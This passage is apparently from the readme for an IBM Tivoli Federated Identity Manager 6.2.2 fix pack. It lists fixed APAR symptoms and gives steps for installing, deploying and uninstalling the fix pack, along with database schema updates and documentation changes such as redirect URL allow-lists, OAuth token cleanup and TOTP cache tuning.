  7. When an OAuth 1.0 client requests a temporary token without specifying a realm, uses that temporary token to obtain an access token, and then uses that access token and specifies a realm, Tivoli Federated Identity Manager throws a realm validation exception.
(See the documentation updates for APAR IV17609.)

IV17409
SYMPTOM: The AuthenticatingAuthority sub-element in the SAML AuthnContext is not available in Tivoli Federated Identity Manager. (See the documentation updates for APAR IV17409.)

IV17413
SYMPTOM: RelayState URL encoding and decoding in SAML 2.0 unsolicited SSO can only be configured at the global level. Support for federation and partner level configuration is required. (See the documentation updates for APAR IV17413.)

IV17403
SYMPTOM: The sample TDI mapping rule is missing the AuthenticatingAuthority attribute.

IV17412
SYMPTOM: Tivoli Access Manager WebSEAL failover cookies do not work when Tivoli Federated Identity Manager is configured to generate IV credential tokens without using PDAcld. (See the documentation updates for APAR IV17412.)

IV17180
SYMPTOM: The manageItfimPointOfContact CLI does not update the runtime custom properties when deploying Tivoli Federated Identity Manager runtime without providing the point of contact settings override response file.

IV17411
SYMPTOM:
  1. When defining a text field in GUIXML, and setting its default value to a string containing a quotation mark, Tivoli Federated Identity Manager throws an exception when loading the GUIXML page saying that the XML is invalid.
  2. In an STS module which has an 'init' page widget which has a multi-valued TextField, only the first value of the multiple values is displayed when viewing the module instance properties.

IV17485
SYMPTOM: The Tivoli Federated Identity Manager Single Sign On protocol service (SPS) collects the HTTP Request information to route the single sign on flow. That information is used to send the request to the appropriate delegate protocol, to generate the response on the appropriate locale, to authenticate the user, etc. The HTTP request information is successfully consumed by the SPS but is never made available to the Secure Token Service (STS). (See the documentation updates for APAR IV17485.)

IV17421
SYMPTOM: The Tivoli Federated Identity Manager HTTP server Web Plugins do not support the latest versions of IIS or Apache/IHS on new operating systems. (See the documentation updates for APAR IV17421.)

IV17422
SYMPTOM: After migrating to Tivoli Federated Identity Manager 6.2.2 from previous version, OAuth event mappings are not shown in the Event pages. Hence, the customization of template pages are not available. (See the documentation updates for APAR IV17422.)

IV15372
SYMPTOM: The Tivoli Federated Identity Manager Kerberos Delegation STS module does not support running in 64bit JVMs on 64bit versions of Windows. (See the documentation updates for APAR IV15372.)

Before installing the fix pack

Be aware of the following considerations before installing this fix pack:

WARNING: It is strongly suggested that you backup existing one-time password pages if you meet the following conditions:

  • You are currently on TFIM 6.2.2 Fix Pack 4
  • You have modified the HTML pages located in FIM_INSTALL_DIR/pages/locale/otp directory
    • The 6.2.2 fix pack installation overwrites the existing one-time password pages if you are upgrading from Fix Pack 4. If you want to use the existing one-time password pages, you will have to migrate them to the new format.

    Installation path specification for the Windows Server 2008 platform
    This preinstallation item applies only to installations on a 64-bit Windows platform like Windows Server 2008.

    Tivoli Federated Identity Manager is a 32-bit application. Therefore, its default path when installing on Windows Server 2008 changes from

    C:\Program Files\IBM\FIM

    to:

    C:\Program Files (x86)\IBM\FIM

    NOTE: Changing the installation path name affects a 32-bit WebSphere Application Server on Windows Server 2008.

    C:\Program Files\IBM\WebSphere

    changes to:

    C:\Program Files (x86)\IBM\WebSphere

    Prerequisites
    You must have the following software installed to install this fix pack:

    Runtime and management service

    The runtime and management service component requires WebSphere® Application Server to be installed. The following list provides descriptions for various versions of WebSphere Application Server that are compatible with Tivoli® Federated Identity Manager, version 6.2.2.

    Install one of the following versions of WebSphere Application Server:

    Update Installer
    This fix pack requires the use of the IBM WebSphere Update Installer version 7.0.0.17 or later. Ensure that you install the appropriate version of the IBM WebSphere Update Installer on each computer where you plan to install the fix pack for the version of WebSphere Application Server used. You can download the most recent IBM WebSphere Update Installer from the WebSphere Application Server Update Installer website. Installation instructions are on the download page.

    Fix pack packaging
    This Tivoli Federated Identity Manager 6.2.2-TIV-TFIM-FP0018 patch package is provided on the Tivoli Support Web site as a single downloadable zip file for each supported platform. After you select the appropriate package for the target platform, download the package and unzip the contents into a target directory. Typically, the default IBM WebSphere Update Installer directory is either of the following:

    C:\Program Files\IBM\WebSphere\UpdateInstaller\maintenance

    for Windows or

    /opt/IBM/WebSphere/UpdateInstaller/maintenance

    for Unix/Linux

    Unzip the downloaded file before you apply the patch. The unzipped contents contain one or more .pak files. Each pak file corresponds to one or more product components. For example, a fix pack might contain two pak files: one for the administration console and management service and runtime components, and one for the WSSM component. The list of product components is included in Fix pack structure.

    Use the IBM WebSphere Update Installer to apply the fixes of each pak file to the target component on the system that you are updating. Apply all of the pak files that your installation requires to ensure that the software levels in your environment are identical for all of the components for which a pak file is supplied. The fixes are tested against all affected components. To minimize any possible issue that can arise from applying a partial fix, ensure the you apply the complete set of files. See Installing the fix pack for specific instructions on using Update installer to apply the fixes.

    Automatic creation of a backup directory
    The Update Installer saves backup copies of the files that it replaces during the installation. You do not need to manually backup the Federated Identity Manager files.

    Incorrect keystore path
    The WebSphere Application Server keystore path that is specified in fim.appservers.properties might be incorrect. If the property was.keystore.file is present, ensure that the value is correct before you proceed with the installation.

    Installing the fix pack

    NOTE: Before installing this fix pack, ensure that you have reviewed the prerequisites in Before installing the fix pack.


    Downloading the fix pack

    To obtain the fix pack, go to the IBM Fix Central Web site.


    Setting the WebSphere Application Server security passwords

    NOTE: The information provided below is only required for instances where the WebSphere Application Server administrator credentials have been changed since Tivoli Federated Identity Manager was installed. The WebSphere Application Server administrator credentials are retained by the installer so that Federation First Steps works immediately after installation.

    If security is enabled on the WebSphere Application Server where Federated Identity Manager is installed, set the appropriate password values in the fim.appservers.properties file before you can apply the fix pack.

    If security is not enabled, you can skip this step.

    NOTE: If you add passwords to the fim.appservers.properties file, as described below, specify the passwords using plain text. However, at the end of the fix pack installation process the passwords are obfuscated and are no longer available in plain text format.

    To specify security passwords, use the following procedure:

    1. Using a text editor, open the file FIM_INSTALL_DIR/etc/fim.appservers.properties.
    2. If the was.security.enabled property is present in the fim.appservers.properties file and is set to true then you must add two password properties to the file: For example,
    3. If the ewas.security.enabled property is present in the fim.appservers.properties file and is set to true then you must add two password properties to the file: For example,
    4. Save and close the fim.appservers.properties file

    Applying the fix pack

    1. Unzip the file you downloaded in Downloading the fix pack, preferably into the default IBM WebSphere Update Installer's maintenence directory,
      C:\Program Files\IBM\WebSphere\UpdateInstaller\maintenance

      for Windows, or

      /opt/IBM/WebSphere/UpdateInstaller/maintenance

      for Unix/Linux.

    2. Ensure that the WebSphere Application Server that hosts the Federated Identity Manager runtime and management service component is running.
    3. Ensure that the WebSphere Application Server that hosts the Federated Identity Manager console component is running.
    4. Start the appropriate IBM WebSphere Update Installer (typically located in C:\Program Files\IBM\WebSphere\UpdateInstaller on Windows systems, or in /opt/IBM/WebSphere/UpdateInstaller on UNIX-based systems).
    5. In the Welcome window click Next. Federated Identity Manager is not listed, but is supported.
    6. Specify the path to the installation directory for Federated Identity Manager (typically C:\Program Files\IBM\FIM on Windows systems, or /opt/IBM/FIM on UNIX-based systems), then click Next.
    7. Select Install maintenance in the dialog.
    8. Specify the path where the fix pack (.pak) files were unzipped. The Update Installer automatically detects, enables, and displays the FIM fixes (pak files).
    9. Determine which product components are installed on the system that you are updating. You should install only the pak files that correspond to the components on the target system. To determine the names and version levels of the product components installed on the target system, view the contents of the FIM_INSTALL_DIR/etc/version.propeties file with a text editor. The following list describes how to interpret the properties in the version.properties file:

      itfim.build.version.rte-mgmtsvcs=version
      Specifies that the management service and runtime component is installed at the level specified by version.
      itfim.build.version.mgmtcon=version
      Specifies that the administration console component is installed at the level specified by version.
      itfim.build.version.wsprov=version
      Specifies that the WS-provisioning runtime component is installed at the level specified by version.
      itfim.build.version.wssm=version
      Specifies that the Web services security management (WSSM) component is installed at the level specified by version.
      itfim.build.version.fimpi=version
      Specifies that the Web plug-in (either the Internet information services (IIS) Web plug-in or the Apache/IBM HTTP Server Web plug-in) is installed at the level specified by version.

      Apply the fix packs to the product's components in the following order:

      1. Management service and runtime and administration console
      2. Other components

      NOTE: If a domain is not created before application of Tivoli Federated Identity Manager fix pack, the fix pack installation completes successfully with a "Partially Successful" message.

    10. Compare the list of installed components to the list of pak files in the IBM WebSphere Update Installer and select the pak files that correspond to the installed components, then click Next.

      NOTE: The IBM WebSphere Update Installer allows you to select more than one pak file at a time for execution. Select only the pak files that correspond to the components that are installed on the system you are updating. If you accidentally install more pak files than needed, you can separately uninstall any fix packs for components that are not installed on the target system.

    11. If needed (for example, if you need to install multiple pak files on the target system, and you only installed one pak file), repeat the previous step to install any additional pak files on the target system.

    NOTE: If you are using the Kerberos Delegation STS module, you need to do the following to ensure the Kerberos Delegation DLL is not loaded in the Java Virtual Machine when it is replaced during runtime component deployment:

    1. Restart all the runtime nodes.
    2. Do not make any requests to the STS chain that invokes the Kerberos Delegation STS module.
    3. Deploy the runtime component. See Deploying the fix pack runtime component for details.

    Updating the database schema for one-time password user information

    If you have configured the one-time password user information provider plug-in to retrieve values from a database, you must update the database schema for one-time password user information.

    1. Stop the WebSphere Application Server that hosts the Federated Identity Manager runtime and management service component.
    2. Run the .sql file to update the database schema for one-time password user information.
    3. Start the WebSphere Application Server that hosts the Federated Identity Manager runtime and management service component.

    Updating the database schema for risk-based access

    If you have used a fixpack before 6.2.2-TIV-TFIM-FP0012 to install, deploy and configure risk-based access, you must update the database schema for risk-based access after installing fix pack.

    1. Stop the WebSphere Application Server that hosts the runtime security service of Tivoli Security Policy Manager and Federated Identity Manager runtime and management service component.
    2. Run the .sql file to update the database schema for risk-based access.
    3. Start the WebSphere Application Server that hosts the runtime security service of Tivoli Security Policy Manager and Federated Identity Manager runtime and management service component.

    Updating the database schema for IV92373

    APAR IV92373 addresses issue where userID collision can occur for alias service.

    IV92373_ALIASUSERPARTNER_migration.sql will be available to download at the same location where to download TFIM 6.2.2 FP18 in FixCentral.

    Below are steps to migrate using the provided sql file:

    1. Stop network traffic to the TFIM runtime nodes.
    2. Stop TFIM runtime nodes that are accessing the JDBC database.
    3. Backup the existing JDBC database tables.
    4. Inspect IV92373_ALIASUSERPARTNER_migration.sql to make sure it matches your alias DB deployment.
    5. Run the IV92373_ALIASUSERPARTNER_migration.sql which will create a new unified table and move the existing entries into the new table.
    6. Restart TFIM runtime nodes.
    7. Restart TFIM network traffic.

    Deploying the fix pack runtime component

    After you install the fix pack, redeploy the Tivoli Federated Identity Manager runtime. This task is identical to the deployment task you completed after the initial installation of the management service and runtime components. In a WebSphere cluster environment, you must ensure that the new runtime component is deployed to each WebSphere node.

    The initial deployment steps are described in Creating and deploying a new domain in the Configuring Guide. The specific instructions for deploying the runtime begin in step 16.

    NOTES:

    Use the following procedure to deploy the updated Federated Identity Manager runtime:

    1. Log in to the Integrated Solutions Console.
    2. Select Domain Management-> Runtime Node Management.
    3. Ensure that the new runtime (version 6.2.2.) is displayed as available.
    4. Click Deploy Runtime.
    5. Wait for the deployment to finish by selecting Click to refresh runtime deployment status and check for completion...
    6. If the domain was not created before application of Tivoli Federated Identity Manager fix pack, click Publish Plug-ins.
    7. Verify that the currently deployed version is now 6.2.2. as follows:
      1. Navigate to the Runtime Node Management window.
      2. Look in the Runtime Management section of the Runtime Nodes portlet in the right panel and review the runtime information.

        3. Example:

        Runtime Information
        ----------------------------------------------
        Current deployed version 6.2.2. [141003a]

        NOTE: The number within the brackets [141003a] might be different from this example.

    8. Repeat the previous step for each node in a WebSphere cluster environment.
    9. Restart WebSphere® Application Server where the Tivoli Federated Identity Manager management service is installed.

    Publish the fix pack plug-ins to the runtime and reload the configuration

    After you install the fix pack and redeploy the Tivoli Federated Identity Manager runtime you must re-publish the plug-ins to the runtime and reload the configuration.

    Use the following procedure to re-publish the plug-ins:

    1. Log in to the administration console.
    2. Select Domain Management -> Runtime Node Management.
    3. Click Publish Plugins.
    4. After the plug-ins are published, reload the runtime configuration.

    Deploying the fix pack risk-based access components

    After you install the fix pack, redeploy risk-based access components. This task is identical to the deployment task you completed after the initial installation of the risk-based access. In a WebSphere cluster environment, you must ensure that the wsadmin commands are called on a Deployment Manager node.

    The initial deployment steps are described in Deploying risk-based access in the Installing, configuring, and administering risk-based access Guide. The specific instructions for deploying risk-based access begin in step 1.

    Use the following procedure to deploy the updated risk-based access components:

    1. Open a command window and change the current directory to where your WebSphere Application Server profile is located. For example:
    2. To start the wsadmin tool, enter one of the following commands at the command prompt:
    3. To deploy the risk-based access runtime environment and plug-ins, run the following wsadmin command: $AdminTask manageRbaConfiguration {-operation deploy}

    Before uninstalling the fix pack

    Perform these steps to ensure that the Tivoli Federated Identity Manager configuration is compatible with 6.2.2-TIV-TFIM-FP0002 or 6.2.2 with no fix pack applied. Skip this step if you are uninstalling this fix pack to return your installation to 6.2.2-TIV-TFIM-FP0004 or a later fix pack version.

    1. Log in to the Integrated Solutions Console.
    2. Select Domain Management -> Import and Export Configuration.
    3. Click Export Configuration to backup the current configuration to a configuration archive.
    4. Select Domain Management -> Runtime Node Management.
    5. Click Runtime Custom Properties.
    6. Click Create.
    7. Specify a new runtime custom property SPS.AllowDeleteReadOnlyPointOfContactProfile with the value true.
    8. Click OK.
    9. Select Domain Management -> Point of Contact.
    10. Select a point of contact profile with one or more authentication policy callbacks specified and click Delete. To identify this point of contact profile
      1. Select a point of contact profile.
      2. Click Properties.
      3. Click Authentication Policy.
      4. Check the list in Callbacks. If there is one or more authentication policy callbacks specified, delete this point of contact profile.
    11. Repeat the previous step for each point of contact profile with one or more authentication policy callbacks specified.
    12. Unconfigure a one-time password federation by typing the command $AdminTask manageItfimOneTimePassword { -operation unconfigure -fimDomainName domainName -federationName federationName } in wsadmin tool.
    13. Repeat the previous step for each one-time password federation.
    14. Reload Tivoli Federated Identity Manager runtime by typing the command $AdminTask reloadItfimRuntime { -fimDomainName domainName } in wsadmin tool.

    Uninstalling the fix pack

    NOTE: Before uninstalling this fix pack, ensure that you completed the steps in Before uninstalling the fix pack.

    If you want to return your installation to the state it was in before installing the fix pack, you can uninstall the fix pack.

    1. Ensure that the WebSphere Application Server that hosts the Federated Identity Manager runtime and management service components is running.
    2. Ensure that the WebSphere Application Server that hosts the Federated Identity Manager console component is running.
    3. Start the appropriate IBM WebSphere Update Installer (typically located in C:\Program Files\IBM\WebSphere\UpdateInstaller on Windows systems, or in the equivalent directory on UNIX-based systems)
    4. In the Welcome window, click Next. Tivoli Federated Identity Manager is not listed, but is supported.
    5. Specify the path to the installation directory for Tivoli Federated Identity Manager (typically C:\Program FIles\IBM\FIM on Windows systems, or the equivalent directory for UNIX-based systems), then click Next.
    6. Select Uninstall maintenance in the dialog.
    7. The Update Installer automatically removes the fix pack and restores the previously installed version of Federated Identity Manager.
    8. Verify the successful uninstallation of the fix pack:
      1. Log in to the administration console.
      2. In the Welcome window, verify that the version number is not 6.2.2. and corresponds to the software level on which you installed fix pack .

        For example, if you installed fix pack onto a Federated Identity Manager 6.2.2.0 system, then after uninstalling fix pack you would see the following:

        Suite Name Version
        ----------------------------------------------------------
        Tivoli Federated Identity Manager 6.2.2.0 [111110a]

      9. NOTE: If you are using the Kerberos Delegation STS module, you need to do the following to ensure the Kerberos Delegation DLL is not loaded in the Java Virtual Machine when it is replaced during runtime component deployment:

      1. Restart all the runtime nodes.
      2. Do not make any requests to the STS chain that invokes the Kerberos Delegation STS module.
      3. Deploy the runtime component. See Deploying the fix pack runtime component for details.
    9. Publish the plug-ins to the runtime and reload the configuration:
      1. Log in to the administration console.
      2. Select Domain Management -> Runtime Node Management.
      3. Click Publish Plugins.
      4. After the plug-ins are published, reload the runtime configuration.
    10. Redeploy the runtime for each domain:
      1. Log in to the administration console.
      2. Select Domain Management -> Runtime Node Management.
      3. Click Deploy Runtime.
      4. Wait for the deployment to finish by selecting Click to refresh runtime deployment status and check for completion....
    11. Verify that the currently deployed version is the version you had before installing the fix pack:
      1. In the administration console, navigate to the Runtime Node Management window.
      2. Look in the Runtime Management section of the Runtime Nodes portlet in the right panel. Review the Runtime Information.

        For example:

        Runtime Information
        ----------------------------------------------
        Current deployed version 6.2.2.0 [111110a]

    12. Repeat the previous step for each node in a WebSphere cluster environment.

    Back to Contents




    Documentation updates

    The product documentation for Federated Identity Manager, Version 6.2.2, can be found in the IBM® Tivoli® Federated Identity Manager Knowledge Center.


    OPTION TO EXCLUDE INCLUSIVENAMESPACES IN SAML 2.0 ASSERTION

    In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section Customizing Runtime Properties > Custom Properties Reference, a new custom property is added. This property is:

    SAML20.IncludeInclusiveNamespaces%<FEDERATIONID>%<PARTNERID>

    A boolean value to determine whether to include the InclusiveNamespaces element in the SAML 2.0 assertion. This configuration is specific to a federation partner.

    Back to Contents



    OPTION TO RETURN TOKENTYPE IN WS-FEDERATION RESPONSE

    In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section Customizing Runtime Properties > Custom Properties Reference, a new custom property is added. This property is:

    WSFed.IDP.Response.TokenType%<FEDERATIONID>%<PARTNERID>

    A string value to determine the TokenType to return. This configuration is specific to a federation partner.

    Back to Contents



    DEADLOCKS OCCUR IN THE RBA SESSION TABLES (IV77587)

    In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section Customizing Runtime Properties > Custom Properties Reference, a new custom property is added. This property is:

    session.deletes.per.commit

    An integer value to determine that number of sessions deleted per database commit. This is a tuning parameter to prevent deadlocks in the risk-based access database.

    Back to Contents



    PREVENT DEADLOCKS IN THE RBA SESSION TABLES (IV77588)

    If an upgrade is done from a previous version of the risk-based access, you will need to run the schema upgrade SQL script. Note that some SQL statements in this script might fail if this is not the first time you are upgrading risk-based access. See the Updating the database schema for risk-based access section for details.

    Back to Contents



    UPDATED PRE-INSTALLATION INSTRUCTIONS (IV77597)

    Refer to the sections INCORRECT KEYSTORE PATH and UPDATE INSTALLER for updated pre-installation instructions.

    Back to Contents



    Custom Runtime Property to enable / disable URL validation in APAR IV64349, IV64376 and IV64494 (IV64325)

    In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section Customizing Runtime Properties > Custom Properties Reference, a new custom property is added. This property is:

    redirecturl.validation.enabled

    A string value true or false, based on which the URL validation in APAR IV64349, IV64376 and IV64494 will be enabled or disabled.

    Back to Contents



    Specifying allowed URLs to SAML 1.1 and SAML 2.0 federation and partner level through WebSphere CLI, when allowed URLs are set at both federation and partner levels, the white list at partner level take precedence. (IV64349)

    Specifying allowed URLs to SAML 1.1 and SAML 2.0 at partner level

    1. Create response file from SAML1.1 or SAML 2.0 partner through manageItfimPartner command.
    2. Open the exported response file in text editor, add the RedirectAllowedURLs as following to the partner response file. More than one URLs in regular expression can be specified.
      3. <void method="put"> <string>RedirectAllowedURLs</string> <object class="java.util.ArrayList"> <void method="add"> <string>http://.*\.domain1\.com.*</string> </void> <void method="add"> <string>http://.*\.domain2\.com.*</string> </void> </object> </void>
    3. Apply the modified response file to the SAML 1.1 or SAML 2.0 partner through manageItfimPartner command.
    4. Log in to the administration console, Select Domain Management -> Runtime Node Management, Click Reload Configurations.

    Specifying allowed URLs to SAML 1.1 and SAML 2.0 at federation level

    1. Create response file from SAML1.1 or SAML 2.0 federation through manageItfimFederation command.
    2. Open the exported response file in text editor, add the RedirectAllowedURLs as following to the federation response file. More than one URLs in regular expression can be specified.
      3. <void method="put"> <string>RedirectAllowedURLs</string> <object class="java.util.ArrayList"> <void method="add"> <string>http://.*\.domain1\.com.*</string> </void> <void method="add"> <string>http://.*\.domain2\.com.*</string> </void> </object> </void>
    3. Apply the modified response file to the SAML 1.1 or SAML 2.0 federation through manageItfimFederation command.
    4. Log in to the administration console, Select Domain Management -> Runtime Node Management, Click Reload Configurations.

    Back to Contents



    Specifying allowed URLs to OpenID federation level through WebSphere CLI. (IV64376)

    Specifying allowed URLs to OpenID federation level

    1. Create response file from OpenID federation through manageItfimFederation command.
    2. Open the exported response file in text editor, add the RedirectAllowedURLs as following to the federation response file. More than one URLs in regular expression can be specified.
      3. <void method="put"> <string>RedirectAllowedURLs</string> <object class="java.util.ArrayList"> <void method="add"> <string>http://.*\.domain1\.com.*</string> </void> <void method="add"> <string>http://.*\.domain2\.com.*</string> </void> </object> </void>
    3. Apply the modified response file to the OpenID federation through manageItfimFederation command.
    4. Log in to the administration console, Select Domain Management -> Runtime Node Management, Click Reload Configurations.

    Back to Contents



    Specifying URLs that the Authentication Service can redirect to (IV64494)

    In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section Customizing Runtime Properties > Custom Properties Reference, a new custom property is added. This property is:

    redirecturl.validation.whitelist

    A comma-separated list of regular expressions. FIM Authentication Service can redirect to a URL that matches any of the regular expressions.

    Back to Contents



    COUNTER-BASED ONE-TIME PASSWORD AND TIME-BASED ONE-TIME PASSWORD SUPPORT

    For more information on Counter-based one-time password (HOTP) and Time-based one-time password (TOTP), see the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    TFIMCFG UTILITY SUPPORT FOR WEBSEAL OAUTH EAS

    See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    SUPPORTED MACROS FOR CUSTOMIZING AN AUTHENTICATION LOGIN FORM

    See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    ONE-TIME PASSWORD SUPPORT FIXES (IV36145)

    For more information on outbound HTTP proxy server support, SMS success or failure determination, new one-time password error messages, creating user-defined macros, one-time password delivery and provider updates, one-time password resend support and unauthenticated one-time password flow, see the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    USER SELF CARE SUPPORT FIX (IV36140)

    For more information on User Self Care session information storage, see the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    TFIMCFG UTILITY SUPPORT FOR WEB GATEWAY APPLIANCE

    See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    USER SELF CARE MULTIPLE SECRET QUESTION

    See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    FEDERATION FIRST STEPS TOOL

    See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    ONE-TIME PASSWORD

    See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    The API documentation for the custom pluggable interfaces is contained in the 6.2.2-TIV-ITFIM-FP00010-doc.zip. This .zip file can be found in the file you downloaded in Downloading the fix pack. You must unpackage the files in FIM_INSTALL_DIR.

    See the API documentation for more details on how to extend the one-time password implementation.

    See ONE-TIME PASSWORD SUPPORT FIXES for more information on fixes for the one-time password support since Tivoli Federated Identity Manager 6.2.2, LA interim fix 5.

    Back to Contents



    RISK-BASED ACCESS

    See the IBM Tivoli Federated Identity Manager Knowledge Center for more details.

    Back to Contents



    ADDING INSTRUCTIONS TO SET CS ISOLATION LEVEL WITHIN THE RBA DATABASE CONFIGURATION (IV55405)

    The following procedure is found in the IBM Tivoli Federated Identity Manager Knowledge Center.

    1. Install a supported database.
    2. Create and configure a JNDI context named jdbc/rba in WebSphere® Application Server. For more information, see the WebSphere Application Server Version 7.0 Knowledge Center at http://pic.dhe.ibm.com/infocenter/wasinfo/v7r0/index.jsp. Search for configuring a data source.
    3. Run the script to create the database schema for risk-based access.
      AIX® or Linux systems

      The scripts to create the database are in the /opt/IBM/FIM/rba/dbscripts/ directory.

      1. Run the create_schema.sh shell script that is in the folder that corresponds to your database.
      2. When you run the script, specify the database user name, which is a required parameter. For example, for DB2:
        /opt/IBM/FIM/rba/dbscripts/db2/create_schema.sh database_user_name
      Windows systems
      The SQL files and the batch file to create the database schema are in the C:\Program Files\IBM\FIM\rba\dbscripts\ directory.
      1. Edit the create_schema.sql file and replace &DBUSER with the database user name.
      2. Run the create_schema.bat batch file that is in the folder that corresponds to your database. Specify the create_schema.sql file as the input parameter. For example, for DB2:
        C:\Program Files\IBM\FIM\rba\dbscripts\db2\create_schema.bat create_schema.sql

    4. When the SQL script starts executing, you are prompted for a password. Enter the password of the database user to proceed.

    It should state:

    1. Install a supported database.
    2. Create and configure a JNDI context named jdbc/rba in WebSphere® Application Server. For more information, see the WebSphere Application Server Version 7.0 Knowledge Center at http://pic.dhe.ibm.com/infocenter/wasinfo/v7r0/index.jsp. Search for configuring a data source.
    3. Set the default data access isolation level to Cursor Stability for the data source created in step 2. For more information, see the WebSphere Application Server Version 7.0 Knowledge Center at http://pic.dhe.ibm.com/infocenter/wasinfo/v7r0/index.jsp. Search for setting data access isolation levels.
    4. Run the script to create the database schema for risk-based access.
      AIX® or Linux systems

      The scripts to create the database are in the /opt/IBM/FIM/rba/dbscripts/ directory.

      1. Run the create_schema.sh shell script that is in the folder that corresponds to your database.
      2. When you run the script, specify the database user name, which is a required parameter. For example, for DB2:
        /opt/IBM/FIM/rba/dbscripts/db2/create_schema.sh database_user_name
      Windows systems
      The SQL files and the batch file to create the database schema are in the C:\Program Files\IBM\FIM\rba\dbscripts\ directory.
      1. Edit the create_schema.sql file and replace &DBUSER with the database user name.
      2. Run the create_schema.bat batch file that is in the folder that corresponds to your database. Specify the create_schema.sql file as the input parameter. For example, for DB2:
        C:\Program Files\IBM\FIM\rba\dbscripts\db2\create_schema.bat create_schema.sql

    5. When the SQL script starts executing, you are prompted for a password. Enter the password of the database user to proceed.
    Back to Contents



    TFIMCFG.JAR TOOL ADDITIONAL SUPPORT FOR PORT SHIFTED WEBSEALS (IV52306)

    The WebSEAL server/Web Gateway Appliance that is used as a Point of Contact can be behind a device that is offloading the SSL and translating the port e.g. a F5 load balancing server fronting WebSEAL and the Point of Contact URL pointing to F5 server. In fixpack 9 and below, tfimcfg tool reads the TCP/SSL port of the point of contact server from the WebSEAL configuration file or from the Web Gateway Appliance. However, these might not be the same ports used by the device fronting WebSEAL/Web Gateway Appliance if such a device is used.

    To specify the HTTP/HTTPS port of the device that is fronting WebSEAL, the following properties can be added to the tfimcfg tool response file:

    Back to Contents



    UNCLEARED ACCESS TOKEN WITH FAILED OAUTH 2.0 RESOURCE OWNER PASSWORD CREDENTIALS FLOW (IV52630)

    APAR Symptom
    TFIM allow you to create your own mapping rules which can be used to implement custom authorization or state management requirements during an OAuth 2.0 flow. When failure happen in this custom authorization, it is not possible to delete the access token that is generated.
    Error description
    The access token generated will stay in the OAuth token cache.
    About this task
    After the fixpack is installed, follow the steps below.
    Procedure
    1. Edit your OAuth mapping rule to remove the generated access token when the custom authorization failed. 
        importPackage(Packages.com.tivoli.am.fim.trustserver.sts.uuser);
  importPackage(Packages.com.tivoli.am.fim.trustserver.sts.utilities);
  importPackage(Packages.com.tivoli.am.fim.trustserver.sts.modules.oauth20.utils);
 
  // do custom authorization
  // authResult = ...

  // if custom authorization failed remove the access token
  if (authResult == false) {
      var access_token;
      // The access token
      temp_attr = stsuu.getContextAttributes().getAttributeValuesByNameAndType(
              "access_token", "urn:ibm:names:ITFIM:oauth:response:attribute");
      if (temp_attr != null && temp_attr.length > 0) {
      access_token = temp_attr[0];
      }

      if (access_token != null) {
          OAuth20STSUtilities.removeOauthToken(access_token, stsrequest);
      }

      // handle failure
  }
    2. Save the modified mapping rule.
    3. From the Integrated Solutions Console, navigate to Tivoli Federated Identity Manager > Configure Federated Single Sign-On > Federations.
    4. Select the OAuth 2.0 federation and click Properties ....
    5. Under Identity Mapping Properties click Modify Current Properties ....
    6. Under Identity Mapping Rule for federation <federation> click Modify Rule ....
    7. Under Import new Identity Mapping Rule for federation <federation> click Choose File and choose your modified mapping rule.
    8. Under Identity Mapping Rule for federation <federation> click Modify Rule ....
    9. Click Import File, then click OK.
    10. Click Load configuration changesto Tivoli Federated Identity Manager runtime.

    Back to Contents



    DB2 SCHEMA CREATION SCRIPT SHOULD PROMPT FOR PASSWORD (IV52617)

    The DB2 schema creation scripts have been updated to remove the macro &DBPASSWD so that the db2 command will prompt for password.

    In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section One-time password > Customizing one-time password > One-time password user information provider plug-in reference > Setting up DB2 for one-time password user information storage, it is stated:

    a. Edit the create_schema.sql file, and replace &DBUSER and $DBPASSWD with the database user name and password.

    With the fix, it should now be:

    a. Edit the create_schema.sql file, and replace &DBUSER with the database user name.

    Back to Contents



    SPECIFYING URLS THAT THE COMMON DOMAIN COOKIE READING AND WRITING SERVICE IN THE SAML 2.0 IDENTITY PROVIDER DISCOVERY PROFILE CAN REDIRECT TO (IV50637)

    In the IBM Tivoli Federated Identity Manager Configuration Guide, under the section Customizing Runtime Properties > Custom Properties Reference > Custom Properties for SAML 2.0, a new custom property is added. This property is:

    SAML20.CDC.RelayStateAllowedURLs_<FEDERATIONID>

    A comma-separated list of regular expressions. SAML 2.0 Identity Provider Discovery Profile common domain cookie reading and writing service of <FEDERATIONID> can redirect to a URL that matches any of the regular expressions.

    • Default value: SPS URL of the common domain cookie reading or writing service endpoint e.g. https://examplehost/FIM/sps/.*
    • Value type: string
    • Example value: https://examplehost/JCT/protectedresource/.*,https://examplehost2/JCT2/protectedresource2/.*

    Back to Contents



    TOTP VERIFICATION IS SLOW WHEN ONE-TIME USE ENFORCEMENT IS ENABLED (IV52619)

    This issue is only relevant if TOTP is configured with one-time use enforcement enabled. Cache lookup retries WebSphere does not automatically replicate all of the cached data between nodes. Instead, it simply replicates the keys between nodes and only retrieves the data when requested by a particular node. Assume that a key is requested on a particular node system that is not found in the cache. By default, FIM will retries the cache lookup operation, allowing time for WebSphere to complete any possible replication. The downside of this is that waiting for replication takes time, and that time translates into a slower user experience. There are two parameters that control the retry behavior (see below for details): (Note: These parameters affect all of FIM, not just TOTP. This is appropriate, because every cache is subject to the same timing considerations and the same tuning should be applied to all.)

    Starting configuration

    Start by configuring TFIM to not retry at all, then enable retries if necessary. To perform this configuration, set the value of the DistributedMap.GetRetryLimit paramter to '0' following the steps below. If FIM is deployed on a single application server, it is safe to set GetRetryValue and GetRetryLimit to 0 since there is only one distributed cache instance and no propagation is needed. Configuration

    Configuration

    DistributedMap.GetRetryLimit

